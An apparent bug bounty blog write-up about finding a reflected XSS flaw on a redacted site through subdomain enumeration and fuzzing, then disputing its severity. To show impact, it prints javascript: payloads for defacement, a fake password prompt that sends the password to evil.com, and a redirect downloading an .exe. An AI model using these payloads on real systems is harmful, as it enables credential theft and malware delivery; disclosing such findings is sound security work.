Hi fellow hunters, in this write-up, I will explain how I found a reflected cross-site scripting bug and showed multiple attack scenarios.
The target I was testing was an old public program, I will refer to it as www.redacted.com throughout this blog so let’s get started.
Finding Reflected XSS
I found a unique subdomain by performing Vertical and Horizontal subdomain enumeration. Have created my own bash script for subdomain enumeration which is based on the above methodology.
Check out this blog for subdomain enumeration.
https://sidxparab.gitbook.io/subdomain-enumeration-guide/types/horizontal-enumeration
The unique subdomain was accounts.example-website-test02.redacted.com’ when I tried to visit this subdomain it was redirecting me to the main domain www.redacted.com/login so I decided to fuzz the directories with ffuf
After Fuzzing got an endpoint named launcher on which there was a JS file with numerous hidden endpoints.
In JS file I found an Endpoint named LinkPsn on which I did recursive fuzzing and got one more endpoint named conflict, there was a page containing a continue button where I performed parameter fuzzing and find out the successRedirect Parameter which was vulnerable after clicking on continue button alert pops up.
I immediately report this and my report was triaged but here is a twist!
staff member change the severity to low and give a $500 bounty I was shocked because on Low bug they were offering $500 & on Medium they were offering $2000.
Staff Members Response
This is a reflected XSS, this means that the only way to achieve something out of it is through phishing or something of the sorts. For this reason we decided to decrease the severity of this issue.
The Reflected XSS comes under the Severity Medium (4 ~ 6.9)
So I decided to show the impact by creating multiple use cases with the help of my friend Saad Ahmed
There are various means by which an attacker might induce a victim user to make a request that they control, to deliver a reflected XSS attack. These include placing links on a website controlled by the attacker, or on another website that allows content to be generated, or by sending a link in an email, tweet, or another message. The attack could be targeted directly against a known user or could be an indiscriminate attack against any users of the application
Below are the different cases in which I have tried my best to show the impact of this Reflected XSS. There is much more we can do using the reflected like controlling the victim browser
by sending him the beef hooked
url using the reflected XSS
Case 1 : DEFACE
Payload:
javascript:document.getElementsByTagName(%60body%60)%5B0%5D.innerHTML=%60%3Ch1%3Ehacked%3C/h1%3E%60//
Case 2 : Stealing Victim Password Sending to the attacker server
Payload :
javascript:document.getElementsByTagName(`body`)[0].innerHTML%20=%20`%3Cb%3ELink%20PlayStation%20Network%20Account%3C/b%3E%3C/br%3E%3C/br%3EVerify%20Your%20Password:%3Cinput%20type=%22password%22%20id=%22pwd%22%3E%3Cinput%20type=%22submit%22%20value=%22Link%20Account%22%20onclick=alert(document.getElementById(%22pwd%22).value)%3E`//
javascript:document.getElementsByTagName(`body`)[0].innerHTML = `<b>Link PlayStation Network Account</b></br></br>Verify Your Password:<input type="password" id="pwd"><input type="submit" value="Link Account" onclick=window.location.href="//evil.com?pwd="%2bdocument.getElementById("pwd").value>`//
Case 3 : Download Malware On Victim Computer
Payload :
javascript:window.location.href="https://thefiletree.com/app/conf/malware.exe"
Case 4 : Controlled DOM
Payload :
javascript:var all = document.getElementsByTagName("*");for (var i=0, max=all.length; i < max; i++) {alert(all[i])}//
Final Note
Thank you very much for your attention and I wish you good luck in finding as many bugs as possible and getting big rewards!